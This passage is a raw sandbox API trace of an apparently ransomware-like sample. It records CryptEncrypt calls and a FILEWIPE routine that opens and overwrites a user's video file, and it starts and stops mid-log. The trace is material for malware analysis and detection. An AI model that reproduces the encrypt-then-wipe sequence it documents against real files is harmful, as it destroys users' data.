[0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0198.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0198.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0198.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0198.586] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2738, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2738*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.586] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.586] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.586] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.586] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.587] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.587] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0198.587] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.587] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.587] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.587] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.587] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.587] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0198.587] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.587] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x2f3c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x2f40) returned 1 [0198.612] CharLowerBuffW (in: lpsz="byte[12097]", cchLength=0xb | out: lpsz="byte[12097]") returned 0xb [0198.612] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.613] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbecf60*, pdwDataLen=0x87e820*=0x2f3c, dwBufLen=0x2f40 | out: pbData=0xbecf60*, pdwDataLen=0x87e820*=0x2f40) returned 1 [0198.613] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.615] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.615] CryptDestroyKey (hKey=0x90af98) returned 1 [0198.615] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.616] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.616] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.616] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0198.617] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.617] FreeLibrary (hLibModule=0x74f20000) returned 1 [0198.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.619] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0198.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1a312ae0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 0x90ae18 [0198.620] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0198.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.620] CharLowerBuffW (in: lpsz="byte[12092]", cchLength=0xb | out: lpsz="byte[12092]") returned 0xb [0198.620] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0198.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.620] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0198.620] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0198.621] FreeLibrary (hLibModule=0x75c90000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.622] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0198.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.622] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0198.622] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\zegvjih7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.623] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0198.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0198.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0198.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0198.624] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0198.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.624] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.624] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.624] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0198.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.624] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.625] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.625] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 